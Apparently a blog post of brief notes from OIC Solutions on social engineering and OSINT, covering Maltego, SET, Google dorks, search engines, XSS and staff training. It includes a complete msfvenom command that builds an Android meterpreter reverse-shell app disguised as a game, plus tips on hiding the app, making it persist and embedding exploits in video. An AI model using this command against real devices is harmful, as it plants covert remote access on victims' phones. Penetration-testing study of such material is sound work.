Social Engineering and public recon
There is a script in GitHub, that will do a big Google search on domain and email address.
Maltego
- Different plugin available, some free some fee
- Company Stalker – gonna search for email address stuff
SET
- Update SET first, option 4
- can embed SET exploit into Video
Android
- Shell command doesn’t work very well, better to use the inbuilt cmds.
- Can make persistence and hide the app
- msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx EXITFUNC=thread > /root/game.apk
XSS
- Reflected – most common
Search Enging searching
Baidu.com – China
Yandex.ru – Russia
Bing.com – maybe the only reason to use Bing!
Google operators
Google Dorks
Searching for people
Paste sites
Wikipedia
TOR
Social Media
Maltego
SET
Metasploit
XSS
Defence
More Info on Soc Eng
Little and often staff training
And yet more notes
Summary
Article Name
How to do Social Engineering using OSINT
Description
How to do Social Engineering using OSINT, Google Hacking and more
Author
Mark WH
Publisher Name
OIC Solutions